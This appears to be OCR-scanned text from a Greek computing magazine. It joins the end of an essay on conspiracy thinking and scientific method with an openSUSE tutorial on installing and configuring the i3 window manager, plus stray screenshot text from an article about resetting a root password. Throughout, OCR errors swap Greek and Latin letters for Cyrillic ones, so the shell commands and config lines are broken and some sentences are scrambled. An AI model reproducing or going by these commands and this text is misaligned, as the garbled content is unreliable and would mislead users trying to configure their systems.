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κουνήσει δεν θα κουνηθεί. Πίσω από κάθε µεταβολή υπάρχεν præ πρόθεση. 


Στον ουρανό, από την άλλη, δεν υπάρχουν µεταβολές. Τα αστέρια, о ήλιος, το φεγγάρι, 
πινούνταν µε ανώννα περιοδυκότητα στις τέλευές τους τροχιές. Ον πλανήτες περιφέρονταν 
ανάμεσά τους κατά συγκεκριμένους τρόπους. Κοντάς τον ουρανό καν είναν πάντα о ἴδιος. 
O ονράννος κόσμος δεν µεταβάλλεταν, δεν πρύβεν εκπλήξεις, είναν τέλειος. 


O κόσμος στα μάτια της αρχαίας επιστήμης ήταν πολύ διαφορετικός алб τον κόσμο 
στα μάτια του Γαλιλαίου καν της νεωτερικής επιστήμης. Н αρχαία επνστήμη ήταν απολύτως 
καν θεµελνωδώς ασύμβατη µε την νεωτερική. Καμία από τις δύο δεν ήταν καλύτερη ἡ XEL- 
ρότερη. Κίναν διαφορετικές. Μιλάνε yra διαφορετικά θέµατα, θέτουν διαφορετικές ερωτή- 
σεις, και Φάχνουν YLA διαφορετικού τύπου απαντήσεις. 

Μεταξύ της αρχαίας жол της νεωτερικής επιστήμης υπήρξε ρήξη, ρήξη την οποία προ- 
κάλεσε άθελά του ο Γαλιλαίος στην προσπάθειά του να απαγκιστρωθεῖ оло τους περιορι- 
σμούς του Καθολικού Δόγματος. Βλέπετε, η αρχαιοελληνική διάκριση μεταξύ επίγενου καν 
ουράνιου κόσμον βόλενε µια χαρά την Εκκλησία: о ουράνιος κόσμος, ο κόσμος του θεού 
καν των αγγέλων, διατηρούσε την τελενότητά τον, ενώ ο επίγενος, ένας κόσμος ατελής 
καν περνορισµένος, εξηγούσε καν τη ροπή του ανθρώπου προς την αμαρτία αλλά παν την 
αναγκαιότητα για την τελική κρίση. O Γαλιλαίος όµως ήθελε τη Γη να υπακούεν στους 
ίδνους νόμους µε αυτούς πον υπάκοναν καν τα ουράννα σώματα. Εξ ου καν το "Καν όµως, 
πινείταν' που θα έχετε ακούσει, δεν µπορεί. 

(Гхооүн2.) 

Ας σχολιάσω, παρεμπιπτόντως, πως η επιστήμη δεν προχώρησε ποτέ πάνω σε μιαν ευ- 
θεία ολοένα καν πληρέστερης γνώσης, ενώ καν το τελικό διακύβευμα της επιστημονικής 
έρευνας δεν ἦταν ποτέ т αλήθεια ως αλήθεια -- whatever that means. Αυτό καλό είναν 
να το θυμόμαστε όποτε µας ζαλίζουν τα αφτιά για την επιστημονική πρόοδο και για τα 
επιτεύγματα της τεχνολογίας. θα μου επιτρέφετε, ωστόσο, αγαπητοί рох, να µην επεντα- 
θώ. Next time. 


Βεκίνησα να μιλάω για τους πλεκτανολόγους, καν κατέληξα να μιλάω γνα την επιστηµο- 
VLKÝ μέθοδο καν για τις διαφορές αρχαίας από νεωτερική επιστήμη. Δεν ήταν τυχαίο (1). 
То αντίθετο μάλιστα. 

Н βασική ιδέα κάθε πλεκτανολογικής προσέγγισης είναν ακριβώς αυτό, πως τα πράγ- 
ματα "δεν είναι τυχαία". Όπως ояр фос ο επιστήμονας έτσι και O πλεκτανολόγος, σκύβουν 
πάνω оло τα φαινόμενα καν προσπαθούν, µε τη βοήθεια της μεθόδου που περιέγραφα ως 
fuzzy pattern recognition, να κάνουν δύο πράγματα: να προσδιορίσουν τα σηµαντικά 
μεγέθη жол τις παραμέτρους τον φαυνομένου, και να διακρίνουν τις σχέσεις µε τις οποίες 
συνδέονταν. 

Αντίθετα оло τους επιστήμονες, ωστόσο, πον αρκούνταν στην πεποίθηση πως о κόσμος 
υπακούει σε κάποια λογική καν επιζητούν να διατυπώσουν τους νόμους αυτής της λογι- 
κής, κάπονον άλλον, εκείνον που τώρα περυγράφω ως πλεκτανολόγους, θεωρούν πως τα 
φαινόμενα του κόσμου τούτου ενέχουν ένα "διότι" ἡ ένα "προκευμένου να" -- δηλαδή µια 
πρόθεση. 

Όπως о φίλος για τον οποίο σας έλεγα. Δεν του αρκούσε η μετεωρολογνκή ερμηνεία των 
καθημερινών εκείνων καταιγίδων το καλοκαίρν του 2002. Έφαχνε να βρεν ποιος τις σχεδί- 
ασε καν ποιόν ὠφελούν. 

θα μπορούσε κανείς να πεν πως ον πλεκτανολόγοι, εν αγνοία τους, βρίσκονταν µε το 
ἕνα πόδι στην νεωτερική жол µε το άλλο στην αρχαία επιστήμη. Δεν τους αρκεί η επιστη- 
μοννκή περιγραφή. Ῥάχνουν να βρουν και την πρόθεση. 


Ίσως εκεί να έγκενταιν το ζήτημα. 

Ίσως σε όλους μάς αρέσει να φανταζόµαστε πως για ὀὁ,τι συμβαίνει υπάρχει πρόθεση. 
Ίσως µας καθησυχάζει αυτό, καν κάνει τη ζωή µας να μονάζει λιγότερο τυχαία. 

Αλλά ας το αφήσω καν αυτό για την άλλη φορά. 


Σας ασπάζομαι, 
θείος Ακάκιος 


Skill: Intermediate 
Tags: i3wm, Linux, openSUSE, Window Managers 


Ι3νιπη: Σημαντική 

αναβάθμιση του 

συστήματός σας, 
δωρεάν! 


Στην αγαπημένη σας διανοµή Linux ο window manager εἶναι το λογισμικό που 
ελέγχει την τοποθέτηση και την εμφάνιση των παραθύρων στην οθόνη, στο 
πλαίσιο του χρησιμοποιούμενου περιβάλλοντος γραφικών. О window manager 
παίζει σηµαντικό ρόλο σε αυτό που ονομάζουμε "εμπειρία χρήσης” και σε 
γενικές γραμμές κάνει τη ζωή µας ευκολότερη. 


Υπάρχουν όµως και περιπτώσεις που µας εμποδίζει από το να είµαστε 100% mapa- 
γωγικοί. Την ίδια στιγµή καταναλώνει πολύτιμους πόρους συστήµατος, χωρίς εμείς 
να αποκοµίζουµε κάποιο ουσιαστικό όφελος. 


Στο παρόν άρθρο παρουσιάζουμε και γνωρίζουμε τον 13 window manager 
(https://i3wm.org), εν συντομία i3Bwm ή απλά 13, о οποίος απευθύνεται σε χρήστες 
που θέλουν να εστιάζουν στην εκάστοτε εργασία και να µην απασχολούνται από τις 
ιδιαιτερότητες του περιβάλλοντος γραφικών. Κατά νου έχουµε developers, διαχει- 
ριστές δικτύων, φοιτητές και σπουδαστές που δουλεύουν στις διπλωματικές ή ота 
διδακτορικάτους, ερευνητές ασφαλείας, επιστήµονες, ОА епдіпеег κ.ά. 


Στα δυνατά σηµεία του ІЗу/т συγκαταλέγονται οι χαμηλές του απαιτήσεις σε TÓ- 
ρους συστήµατος; αφού εγκαταστήσετε τον 13 κι αρχίσετε να εργαζόσαστε στο 
σπαρτιάτικο περιβάλλον του, σχεδόν αµέσως Өа αισθανθείτε σαν να αποκτήσατε 
καινούργιο, γρηγορότερο υπολογιστή. Προκειμένου να σχηµατίσουµε µια πρώτη £l- 
κόνα για τον іЗмт, αξίζει να δούµε τέσσερις μεγάλες κατηγορίες window managers. 


Compositing. Τα παράθυρα δημιουργούνται και σχεδιάζονται σε ξεχωριστά buffers. 
О window manager συνθέτει (composes) τα buffers δημιουργώντας µια εικόνα που 
αναπαριστά ότι προβλέπεται να βλέπουμε στην οθόνη, µετά γράφει τα αποτελέ- 
ората στη display memory. Οι λεγόμενοι compositing window managers συνήθως 
επεξεργάζονται περαιτέρω τα παράθυρα στα buffers, εφαρμόζοντας εφέ 2D/3D και 
animations όπως blurring, fading, scaling κ.ο.κ. Παρουσία του κατάλληλου hardware 
και βεβαίως των αντίστοιχων drivers, εφέ όπως σκιές, live previews και animations 
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εκτελούνται орала και σε πραγµατικό χρόνο. Παραδείγματα compositing window 
managers αποτελούν ο Quartz Compositor ото Мас OS X, та Compiz, KWin και Mutter 
για διάφορα περιβάλλονταγραφικών ото Linux, καθώς кіо Desktop Window Manager 
oTa Microsoft Windows. 


Stacking. Ονομάζονται και floating window managers και σχεδιάζουν όλα 
τα παράθυρα σε µια συγκεκριμένη σειρά µε βάση τον painter's algorithm 
(https://en.wikipedia.org/wiki/Painter%27s_algorithm), επιτρέποντας τους να αλλη- 
λοκαλύπτονται. Όλοι οι window managers που επιτρέπουν την αλληλοκάλυψη ma- 
ραθύρων χωρίς να εἶναι compositors, εμπίπτουν στη συγκεκριμένη κατηγορία. Та 
παράθυρα σχεδιάζονται éva ένα και η διαδικασία ξεκινά µε то ίδιο το desktop, µετά 
µε το παράθυρο ή τα παράθυρα που εἰναι πιο κοντά στο desktop (άρα πιο µακριά 
σε σχέση µε τον χρήστη) κ.ο.κ. Φυσικά, ο σχεδιασμός ενός παραθύρου επιτρέπεται 
ακόµη κι αν καλύπτει εν μέρει (ή και ολικά) παράθυρα που έχουν ήδη σχεδιαστεί. 
Τα Windows 1.0 καθώς και то Classic Мас OS χρησιμοποιούσαν stacking window 
managers. Οι бе awesome (µε πεζό "а") και Window Maker αποτελούν άλλα δύο na- 
ραδείγµατα stacking window managers που συναντάμε στις διανομές του Linux. 


Tiling. Σε αντίθεση µε τους floating, οι tiling window managers χωρίζουν την οθό- 
νη σε µη-αλληλοκαλυπτόμενα πλαίσια. Κάθε πλαίσιο είναι δυνατόν να περιλαμβά- 
νει éva παράθυρο ή δύο, επίσης µη-αλληλοκαλυπτόμενα πλαίσια. О 13 εξ ορισμού 
συμπεριφέρεται ως ένας tiling window manager, ἔχει όμως τη δυνατότητα να Ou- 
μπεριφέρεται κι ως floating. Ακριβώς γι αυτό το λόγο ανήκει στην κατηγορία των 
dynamic window managers. 


Dynamic. Οι window managers της κατηγορίας μπορούν και συμπεριφέρονται είτε 
ως stacking (floating) είτε ως tiling. Όπως αναφέραμε μόλις, ο ἴϑννπη εἶναι ένας 
τέτοιος window manager. Άλλοι εκπρόσωποι της κατηγορίας είναι οι awesome, 
хтопаа κι ο θρυλικός FVWM. 


Πα το υπόλοιπο του άρθρου στρέφουµε την προσοχή µας στον ἰϑννπη. Εννοείται ότι 
μας ενδιαφέρει να τον εγκαταστήσουμε, να τον φέρουμε στα µέτρα µας και να ap- 
χίσουμε να εργαζόµαστε στο περιβάλλον του. Υποψιαζόμαστε ότι είτε θα τον Ла- 
τρέψετε, είτεθα αδιαφορήσετε παντελώς γιατην ὐπαρξή του. Προσέξτε: Σε καμία 
περίπτωση беу λέμε ότι Ва τον μισήσετε - αλλά µπορεί και να κάνουμε λάθος Ῥ Ас 
αφήσουμε όµως тп συζήτηση κι ας περάσουμε στη δράση. 


Εγκατάσταση και βασική ρύθμιση 


Δουλεύουμε σε ένα σύστημα µε openSUSE Leap 42.2 και περιβάλλον γραφικών το 
GNOME. Αυτό το τελευταίο βέβαια δεν έχει κάποια σημασία για τον i3: στις εγκατα- 
στάσεις Linux συχνά συνυπάρχουν περισσότερα апо ένα περιβάλλοντα γραφικών 
και, κατά το login στο λογαριασμό ενός χρήστη, είτε ενεργοποιείται то προκαθο- 
ρισµένο περιβάλλον siTe επιλέγεται éva από τα υπόλοιπα που εἶναι παρόντα στο 
σύστημα. 
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Πρώτο µας μέλημα τώρα είναι να εγκαταστήσουµε τον i3 window manager, µαζί µε 
μερικά χρήσιμα εργαλεία. Με δικαιώµατα διαχειριστή, σε ÉVA τερματικό πληκτρο- 
λογούμε ώστε ναεπικαιροποιήσουμε та repositories тпс διανομής. Μετά 
εφαρμόζουμε τα όποια διαθέσιµα patches γράφοντας κι ακολούθως 
έρχεται η σειρά του 13 κι ορισμένων καλών φίλων: 


2уррег -n іп 13 135%а%и5 i3lock атепи feh 


Ας δούμε λίγο καθένα από τα πέντε αυτά RPM packages. 


ІЗ: το πακέτο του ІЗ, του dynamic window manager που μόλις εγκαταστήσαμε ото 
openSUSE µας 

i3status: utility που παράγει strings µε πληροφορίες για την i3bar, την προκαθορι- 
σµένη μπάρα του 13 

іЗІосК: όταν ενεργοποιείται κλειδώνει την οθόνη κι επιτρέπει την πρόσβαση μόνον 
αφού πληκτρολογηθεί σωστά το раѕѕмога του χρήστη 

Ятепи: utility για τη γρήγορη εκκίνηση εφαρμογών 

feh: ευέλικτος image viewer, χρησιμεύει και για τον καθορισμό wallpaper 

Αυτή τη στιγµή о 13 πρέπει να εἶναι εγκατεστημένος και μπορούμε να κάνουμε 
logout апо το τρέχον GNOME session. Κατά τα αναμενόμενα, θα εμφανιστεί η οθόνη 
login του GDM --ή όποιου άλλου login manager χρησιμοποιείτε, τέλος πάντων. Πριν 


συνδεθούµε στο λογαριασμό του χρήστη µας, πατάμε στο εικονίδιο µε то γρανάζι κι 
επιλέγουμε τον ІЗ. 


Тіш 21:03 


AO User Userson 


13 (with debug log) 


м 


Επιλογή του ІЗ window 
тападег, λίγο πριν 

6 openSUSE συνδεθούµε στο λογαριασμό 
του χρήστη User Шѕегѕоп. 
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Την πρώτη φορά που θα ενεργοποιηθεί ο ІЗ για το λογαριασμό του χρήστη µας, 
βλέπουμε µια σχεδόν άδεια οθόνη κι éva λιτό παράθυρο για тп βασική ρύθμιση του 
window manager. Το font rendering μάλλον беу θα σας ικανοποιήσει, αλλά μην avn- 
συχείτε: μπορούμε να ορίσουμε οικογένεια γραμματοσειράς -- και λίγο αργότερα 
θα δείξουμε πώς. Στην ερώτηση περί αυτόματης δημιουργίας του σχετικού αρχεί- 
ου ρυθμίσεων απαντάµε καταφατικά, που σημαίνει ότι απλά πιέζουµε το πλήκτρο 
[Enter]. 


Την πρώτη φοράπουθα 
φορτωθεί ο іЗит για τον 
χρήστη µας, είναι καλή ιδέα 
1з: first configuration να δώσουμε то ОК үга την 
αυτόματη δημιουργία ενός 
βασικού αρχείου ρυθμίσεων. 


rate the config 


0, I will use the defaults 


13: generate config 


Р either: 


-> <Win> win 


Δεν ξέρουμε πώς то 
βλέπετε εσείς, εµείς όµως 
ησυχάζουµε και γαληνεύουμε 
όταν то modifier key είναι 
αντιστοιχισµένο στο πλήκτρο 
Windows (ή στο πλήκτρο 
Соттапа). 


Н δεύτερη και τελευταία ερώτηση που µας απευθύνεται σχετικά µε τη δηµιουργία 
του configuration file, αφορά στο modifier key (тоа key). То εν λόγω πλήκτρο έχει 
εξαιρετική σημασία στον κόσµο του 13, αφού συμμετέχει στο σχηματισμό των key 
bindings για το χειρισμό του περιβάλλοντος και τη μετακίνησή µας µέσα σε αυτό. 
Τώρα, λοιπόν, καλούμαστε να αντιστοιχίσουµε το $тоа key είτε στο πλήκτρο [Alt] 
віте στο πλήκτρο [Win] (ή στο [Command], αν μιλάμε για Apple keyboard). Εξ ορισμού 
το $тоа key εἰναι αντιστοιχισµένο στο [Win]/[Command]. Προσωπικά μάς αρέσει 
αυτό, οπότε απλά πατάμε то [Enter] και χωρίς άλλη καθυστέρηση το configuration 
του 13 δημιουργείται. 


Πού βρισκόμαστε και τι κάνουμε 


Πρόκειται βεβαίως για διαχρονικό υπαρξιακό ερώτημα, καταδικασµένο να µη λάβει 
ποτέ 100% ικανοποιητική απάντηση. Εκτός κι αν μιλάμε για τον κόσμο του 13 και 
μόνον αυτόν, οπότε σε αυτή την περίπτωση όλο και κάποια χρήσιμη απάντηση µπο- 
родие να δώσουμε. 
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Το μυστικό για καλή ζωή στον 13 εἰναι τα key bindings. Όσο πιο γρήγορα μάθουμε 
κάποια апо αυτά, τόσο πιο γρήγορα θα εκτιμήσουμε τον window manager - й θα 
αποφασίσουµε ότι беу είναι για εμάς. Στο επίσημο site του 13 υπάρχει µια χρήσιμη 
σελίδα µε key bindings (https://i3Bwm.org/docs/refcard.html). Προτείνουμε να δηµι- 
ουργήσετε ένα σχετικό bookmark ή ακόµη και va TNV εκτυπώσετε. 


Προς το παρόν, σημειώστε ότι για то άνοιγμα ενός terminal απλά πατάμε το συνδυ- 
асро πλήκτρων [ρηποα + Enter] κι ακαριαία εµφανίζεται ένα μεγιστοποιηµένο παρά- 
θυρο τερματικού. Αν δώσουμε άλλο ένα [5тоа + Enter], η οθόνη τότε χωρίζεται στα 
δύο κι έχουµε δύο τερματικά. Παρατηρήστε ότι ο χωρισμός γίνεται κάθετα ἡ οριζό- 
ντια, αναλόγως αν ο προσανατολισμός της οθόνης εἰναι οριζόντιος (wide display) ή 
κάθετος (rotated display) αντίστοιχα. Για τη συνέχεια υποθέτουμε ότι δουλεύουμε 
µε µία µόνο οθόνη, η οποία εἶναι προσανατολισμένη οριζόντια (δεν είναι rotated, ön- 
λαδή). Δοκιμάστε να ανοίξετε κι άλλα παράθυρα τερματικού και δείτε πώς διευθε- 
τούνται. Αν θέλουμε το παράθυρο µε το focus να εἶναι σε ІШІ screen mode, πατάμε 
το συνδυασμό [5тоа + Е]. Па уа то επαναφέρουµε, πατάμε ξανά [ρη]οα + ΕΙ. Κλείστε 
ένα οποιοδήποτε τερματικό που έχει то focus πατώντας, κατά τα γνωστά, [Сі + D] 
ή γράφοντας exit, ακολουθούμενο από [Enter]. Γενικά, µια οποιαδήποτε εφαρµογή 
στον 13 την κλείνουμε µε το συνδυασμό πλήκτρων [5тоа + Shift + Q]. Προτείνεται 
πάντως να χρησιμοποιούμε το μηχανισμό εξόδου/τερματισμού που προσφέρει η 
ἴδια η εφαρμογή. 

Αφήνουμε τώρα στην οθόνη μόνο ένα τερματικό ανοικτό. Н επόμενη κἰνησή µας 
Θα εἰναι να τρέξουµε τον Firefox. Όμως πριν το κάνουμε πατάμε [9πηοά + V]. Αυτή 
η ενέργεια беу φαίνεται να έχει κάποιο αποτέλεσµα. Στην πραγματικότητα, όμως, 
μόλις είπαμε στον ІЗ ότι πλέον θέλουμε τα παράθυρα να χωρίζονται οριζόντια (κι 
ὀχι κάθετα). Δίνουμε [5тоа + D], ὥστε να ενεργοποιηθεί το атепи. Παρατηρήστε 
την οριζόντια μπάρα, στο πάνω µέρος της οθόνης. Στη θυρίδα πάνω αριστερά, γρά- 
φουµε то буора тоо εκτελέσιµου µιας οποιασδήποτε εφαρμογής µε GUI και πατάμε 
[Enter]. Δίνοντας, λοιπόν, [5тоа + D] και πληκτρολογώντας firefox (ακολουθούμενο 
από [Епќеп), ο Firefox ανοίγει. Διαπιστώνουμε ότιη οθόνη έχει χωριστεί σε δύο µέρη, 
οριζόντια: ото πάνω µέρος έχουµε το τερματικό, στο κάτω έχουµε τον Firefox. Με 
то focus στον Firefox, πατάμε [9πηο4 + Н]. Και πάλι δεν φαίνεται να συμβαίνει κάτι, 
στοιχηματίζουμε όµως ότι μαντεύετε τι έχει γίνει, καθώς και τι θα ακολουθήσει. 
Με [$mod + D] εμφανίζουμε το атепи, ώστε να τρέξουµε άλλη µια εφαρμογή. Αυτή 
τη φορά πληκτρολογούμε рпоте-ќегтіпа1 και φυσικά πατάμε то [Enter]. Αμέσως 
θα εμφανιστεί ένα παράθυρο του GNOME Terminal αλλά στο κάτω μισό της οθόνης 
και συγκεκριµένα στο δεξί μισό του κάτω μισού, δίπλα από τον Firefox. Προφανώς, 
λοιπόν, µε [9πηο4 + V] ορίζουμε ότι ο χωρισμός των παραθύρων γίνεται οριζόντια, 
ενώ µε [5тоа + Н] ορίζουμε ότι ο χωρισμός των παραθύρων γίνεται κάθετα. Ло- 
κιμάστε να ανοίξετε διάφορα παράθυρα χωρίζοντας οριζόντια ή κάθετα. Αν θέλε- 
τε, ανοίγετε το ἰδιο παράθυρο αλλάζοντας διαδοχικά τη διεύθυνση του χωρισμού, 
ώστε τελικά να πάρετε στην οθόνη κάτι που θα μοιάζει µε fractal. Από ένα σηµείο 
και µετά αρχίστε να δίνετε τυχαία το focus σε παράθυρα (απλά µετακινείτε τυχαία 
τον δείκτη του ποντικιού) και κλείνετέ τα. Παρατηρήστε пос ανταποκρίνεται о 13, 
τακτοποιώντας αυτόματα τα εναπομείναντα ανοικτά παράθυρα. 
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110.7 GiB Е: по ІР (1000 МЬі+/5) |0.16 |2017-06-25 18:36:00 «65 


neh ik:~> # tile өз 
neholmavik:~> [] 


Δεν έχει κάποια πρακτική σημασία η συγκεκριμένη διευθέτηση των παραθύρων, εκτός ίσως апд το να δείξουμε πώς 
τοποθετεί τα tiles о ІЗ όταν αλλάζουμε διαδοχικά τη διεύθυνση χωρισμού (οριζόντια, κάθετη). Αλήθεια, πόσο αναλυτικό 
μπορεί να γίνει το εικονιζόµενο fractal στη δική σας οθόνη; 


Αναφερθήκαμε μόλις στην αλλαγή focus, µε τη μετακίνηση του δείκτη του ποντι- 
κιού. O i3 όμως δίνει έµφαση στη χρήση του πληκτρολογίου και συνεπώς υπάρχουν 
ήδη key bindings για την αλλαγή του focus. Συγκεκριµένα, µε [9πηοά + J] το focus 
πηγαίνει στο παράθυρο αριστερά, µε [5тоа + ; στο παράθυρο δεξιά, µε [9πηο4 + L] 
πάνω, ενώ µε [$mod + К] κάτω. Αν αντί για [5πποα] + ӘІЛІЛІ/ІКІ πατήσουμε [5тоа + 
Shift] + [J]/G]/[L]/[K], το τρέχον παράθυρο μετακινείται αριστερά/δεξιά/πάνω/κάτω 
αντίστοιχα. Επίσης, αντίγια τα πλήκτρα [J], [1], [L] και [K], μπορούμε να χρησιμοποιού- 
ре τα αντίστοιχα βελάκια του δρομέα. 


Ας υποθέσουμε τώρα ότι θέλουμε να αλλάξουμε το μέγεθος ενός παραθύρου. Ap- 
χικά δίνουμε [5тоа + R] και μετά παίζουμε με τα βελάκια. Θα δούμε το μέγεθος του 
επιλεγμένου παραθύρου να μεταβάλλεται αναλόγως. Όταν ικανοποιηθούµε µε την 
αλλαγή, δίνουμε ξανά [5тоа + R] κι о i3 παύει να ερμηνεύει то πάτηµα των arrow 
keys ως εντολές αλλαγής μεγέθους. 


Τι κάνουμε άραγε αν το τρέχον workspace (σκεφτείτε "Пеѕкіор") έχει πολλά ανοικτά 
παράθυρα και η εργασία σε αυτό беу είναι πλέον τόσο άνετη; Κατ’ αρχάς, µε éva 
συνδυασμό πλήκτρων της µορφής [9πιο4 + ή], όπου το # είναι ακέραιος μεταξύ 0 κι 
9, δημιουργούμε ένα νέο workspace (то 0 αντιστοιχεί στο workspace υπ' αριθμόν 10). 
Σε κάθε workspace μπορούμε, φυσικά, να ἔχουμε ανοικτά όσα κι όποια παράθυρα θέ- 
λουμε. Επίσης, éva παράθυρο που έχει то focus то μεταφέρουμε σε άλλο workspace 
πατώντας ένα συνδυασμό πλήκτρων της μορφής [$mod + Shift + #], όπου то # είναι 
ακέραιος μεταξύ 0 και 9 (και το 0 αντιστοιχεί πάντα στο workspace 10). 


Τέλος, όταν κάποια στιγµή θελήσουμε να βγούμε апо τον 13 (λέμε τώρα) τότε αρκεί 
να πατήσουμε το συνδυασμό πλήκτρων [$mod + Shift + Е]. Στο πάνω μέρος της οθό- 
νης θα εμφανιστεί µια οριζόντια (πορτοκαλί) μπάρα, όπου καλούμαστε να επιβεβαι- 
ώσουμε ή να ακυρώσουµμε την εντολή αποσύνδεσης. 
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Ρύθμιση тоо 13 ММ 


Τη συμπεριφορά αλλά και την όψη του ІЗ τα τροποποιούμε επεμβαίνοντας ото 
configuration Не µε όνοµα config, κάτω апо τον κατάλογο ~/.config/i3 (το πλήρες 
path του αρχείου ρυθμίσεων, δηλαδή, εἶναι ~/.config/i3/config). Μια άλλη θέση του 
config που ἰσως ισχύει үа тп διανοµή σας, εἶναι κάτω апо τον κατάλογο ~/.i3 (το full 
path, δηλαδή, θα είναι ~/i3/config). Το configuration file το ανοίγουμε µε κάποιον text 
editor όπως, TX., мі, nano, gedit к.а. Οι όποιες αλλαγές κάνουμε λαμβάνονται υπόψη 
αποθηκεύοντας κι επανεκκινώντας τον ІЗ επιτόπου, µε ένα [9πηο4 + Shift + В]. Ау 
υπάρχει κάποιο λάθος στο αρχείο ρυθµίσεων, λαμβάνουμε σχετική προειδοποίηση. 
Να πούμε επίσης ότι ανά πάσα στιγµή μπορούμε να επαναφέρουµε το πρωτότυπο 
(αρχικό) config διαγράφοντας το υπάρχον κι αµέσως µετά, σε ένα τερματικό, TAN- 
κτρολογώντας i3-config-wizard. Ανοίξτε τώρα то configuration Ше και ρίξτε µια 
ματιά στο περιεχόμενό του. Θα διαπιστώσετε ότι οι αποδεκτές οδηγίες/ρυθµίσεις 
εἶναι απλές και κατανοητές - και σε αυτό βοηθούν τα επεξηγηµατικά σχόλια. Στη 
συνέχεια παρουσιάζουμε τις επεμβάσεις που έχουµε κάνει στο δικό µας config. Δεν 
είναι υποχρεωτικό να κάνετε ακριβώς τις ίδιες, φυσικά. 


Γραμματοσειρά για τους τίτλους των παραθύρων. Н προκαθορισμένη үроррато- 
σειρά (kat то μέγεθός της) үа тоос τίτλους των παραθύρων, ἰσως va рд σας αρέσει. 
Η προεπιλογή έχει ως εξής: 


font рапро:попозрасе 8 


Στη εκδοχή του config που έχουμε στο σύστηµα των δοκιμών χρησιμοποιούμε τη 
γραμματοσειρά Roboto Mono, µε μέγεθος 11: 


font рапро: гобоёотопо 11 


Τη συγκεκριμένη γραμματοσειρά βρήκαμε κι εγκαταστήσαµε апо το Google Fonts 
(https://fonts.google.com). 
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Προεπιλεγμένη εφαρµογή τερματικού. Εξ ορισμού, отау πατάµε το συνδυασμό 
πλήκτρων [Şmod + Enter] εκτελείται το script ονόματι i3-sensible-terminal. Aou- 
λειά του εἰναι να εντοπίζει την πρώτη διαθέσιµη εφαρµογή τερματικού και να την 
τρέχει. Αν τώρα έχετε κάποιον αγαπημένο terminal emulator και θέλετε να ενερ- 
γοποιείται αυτός χωρίς περιττές αναζητήσεις, αλλάξτε κατάλληλα την ακόλουθη 
οδηγία: 


ріпаѕут $mod+Return exec 13-ѕепѕ1р1е-егтіпа1 


Σε εμάς, T.X., αυτόν τον καιρό αρέσει πολύ то GNOME Terminal, οπότε ото config του 
ІЗ έχουµε την ακόλουθη οδηγία: 


ріпаѕут $mod+Return exec рпоте-ќегтіпа1 --hide-menubar 


Παρατηρήστε την παράμετρο --hide-menubar, χάρη στην οποία To GNOME Terminal 
ξεκινά χωρίς την πάνω οριζόντια μπάρα. Το περιβάλλον του 13 εἶναι λιτό και θέλου- 
με να το διατηρούµε λιτό πάση θυσία. 

Key bindings εκκίνησης εφαρμογών. То htop εἶναι µια εφαρμογή για την κονσόλα 
απλού κειµένου που συχνά-πυκνά εκτελούμε. Π αυτό και στο configuration Ше του 
ІЗ ἔχουμε την ακόλουθη οδηγία: 


ріпаѕут $mod+t exec gnome-terminal -e /usr/bin/htop 


Κάθε φορά που πατάμε τον συνδυασμό πλήκτρων [$mod + ТІ, λοιπόν, ανοίγει éva 
GNOME Terminal ре το htop να τρέχει εντός. Μια άλλη εφαρμογή που τρέχουμε από 
καιρού εις καιρόν είναι το Үа5Т2. Χάρη στην οδηγία 


ріпаѕут $mod+y exec gnome-terminal -e "sudo /иѕг/5ріп/уаѕ12" 


κάθε φορά που πατάμε [Şmod + Y] ανοίγει éva GNOME Terminal, µε το YaST2 va τρέ- 
χει εντός. Παρατηρήστε και τη χρήση του sudo, αφού то YaST2 πρέπει va τρέχει µε 
δικαιώµατα διαχειριστή. 


Καθορισμός wallpaper. Όταν συνδεόµαστε στο περιβάλλον του 13 δεν υπάρχει KÁ- 
ποιο wallpaper. Μπορείτε βεβαίως να καθορίσετε µια εικόνα που προτιμάτε, ώστε 
κατά το φόρτωμα του 13 να μπαίνει ως wallpaper. Παράδειγμα: 


exec --no-startup-id /usr/bin/feh --bg-scale ~/Pictures/opensuse-green- 
lightbulb. jpg 
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Ξεχασμένο root password στο Linux; Κανένα πρόβλημα! | deltaHacker - Mozilla Fi.. 
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Ξεχασμένο root password στο Linux; Κανένα з х» 
| Installati ; ----і-- 7 Е πρόβλημα! 


[Posted by subZraw | 13/06/2017, 20:45 | Published іп addenda | Edit 


ар ава Πότε ήταν η τελευταία φορά που µε τρόμο συνειδητοποιήσατε 

ότι δεν θυμόσαστε то root password σε υπολογιστή µε Linux; Anoo 
Осо άσχετο кі αν σας φαίνεται το ερώτημα (ή όσο κι ау 
ντρεπόσαστε уа παραδεχτείτε ότι την έχετε ήδη πάθει), ας мах 
σημειώσουμε от το να ξεχάσει Κάποιος το συνθηµατικὀ του --- 


διαχειριστή δεν είναι κάτι που συμβαίνει σπάνια. 


Ἣν επόμενη φορά που δεν θα μπορείτε να συνδεθείτε ото root account κάποιου υπολογιστή σας 
є Linux, µην πανικοβληθείτε. Πάρτε µια βαθιά ανάσα κι αναρωτηθείτε: Υπάρχει μήπως άλλος 
πολογιστής ἡ συσκευή, απ’ όπου έχετε φροντίσει για passwordless SSH logins στον υπό 
συζήτηση λογαριασμό; Αν ναι, απλά πηγαίνετε σ’ αυτόν τον άλλον υπολογιστή ἡ συσκευή, $ 
συνδεθείτε στο προαναφερθέν root account απομακρυσμένα, αλλάξτε το password µε το 
εργαλείο passwd, αγαλιάστε και χαρείτε. Ίσως όμως να µην έχετε φροντίσει για passwordless 
logins - τουλάχιστον όχι σε root accounts. Н µπορεί να΄χετε φροντίσει, αλλά τώρα δεν έχετε 
εύκαιρο τον άλλον υπολογιστή ἡ συσκευή, Σε κάθε περίπτωση, αν ἔχετε φυσική πρόσβαση στον 
πολογιστή µε το ξεχασμένο root password, κι αυτός µε τη σειρά του διαθέτει ένα ταπεινό 
[πληκτρολόγιο και µια σεμνή οθόνη, μάθετε ότι είναι εὐκολο να ορίσετε καινούργιο password για 
ον root κι ας µη θυμόσαστε το παλιό 


στη συνέχεια δείχνουμε πώς αλλάζουμε το ξεχασμένο root password συστήµατος µε openSUSE | 
ος τς ο ο τς ο σος 


Το αριστερό μισό του workspace μοιράζονται δύο εφαρμογές (Үа5Т2 και htop) για τις οποίες, παρεμπιπτόντως, έχουμε 
ορίσει αντίστοιχα key bindings. То δεξιό шод του workspace έχει καταλάβει αποκλειστικά о Firefox. 


Όπως βλέπετε, χρησιμοποιούμε το εργαλείο feh και μάλιστα µε την παράµε- 
тро --bg-scale, WOTE το μέγεθος της εικόνας να προσαρμόζεται αυτομάτως ото 
workspace. 


Καθορισμός ανάλυσης οθόνης. О 13 εἶναι σε θέση να εντοπίζει апо μόνος του τη 
